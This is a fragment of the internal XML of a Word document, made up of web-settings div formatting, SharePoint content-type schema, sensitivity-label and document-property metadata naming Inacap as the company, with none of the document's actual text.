            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1977031534">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1882744175">
              <w:marLeft w:val="-75"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="30"/>
              <w:marBottom w:val="30"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1903057325">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="661664648">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1178546059">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1505047200">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="419839217">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2125535815">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1812165900">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="71201316">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1817256873">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1914469878">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1294216770">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="456608445">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="215550398">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1003821235">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1203132514">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="14577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55742">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1654989309">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="22749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FDD3AEC182092488C976483C48157F8" ma:contentTypeVersion="11" ma:contentTypeDescription="Crear nuevo documento." ma:contentTypeScope="" ma:versionID="b46cf9b00ae88fa4f22e628680f5c6a5">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="cb4eefbe-7ee8-429f-9393-43a3a1487e7a" xmlns:ns3="b2770855-c2db-46a0-a763-1abddcbb0bea" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1dc47ab20af36cb0e800dc77ba09b07f" ns2:_="" ns3:_="">
    <xsd:import namespace="cb4eefbe-7ee8-429f-9393-43a3a1487e7a"/>
    <xsd:import namespace="b2770855-c2db-46a0-a763-1abddcbb0b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eefbe-7ee8-429f-9393-43a3a1487e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5e777c97-9e47-4338-8e8a-2390167a358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770855-c2db-46a0-a763-1abddcbb0be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d59cc7f-1612-4856-9383-a40f314d6f7d}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="b2770855-c2db-46a0-a763-1abddcbb0b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770855-c2db-46a0-a763-1abddcbb0bea" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="cb4eefbe-7ee8-429f-9393-43a3a1487e7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8D6D6-591E-47B5-A95E-14A75341AC11}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BDBD6D9A-FF95-449C-9068-FCF94D1103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eefbe-7ee8-429f-9393-43a3a1487e7a"/>
    <ds:schemaRef ds:uri="b2770855-c2db-46a0-a763-1abddcbb0b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3A748-A2DB-433C-9EE0-CB8F53867CD3}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="b2770855-c2db-46a0-a763-1abddcbb0bea"/>
    <ds:schemaRef ds:uri="cb4eefbe-7ee8-429f-9393-43a3a1487e7a"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
<clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
  <clbl:label id="{49f2c5b8-9188-4bc4-b101-05fbcef13b43}" enabled="1" method="Standard" siteId="{562d3f8f-0f81-4ea1-a088-aa80a781527e}"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13</Pages>
  <Words>3784</Words>
  <Characters>20816</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>173</Lines>
  <Paragraphs>49</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>inacap</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>24551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Computación N° 8</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Matias Zepeda</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-03T19:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-08T20:30:00Z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0x010100FFDD3AEC182092488C976483C48157F8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>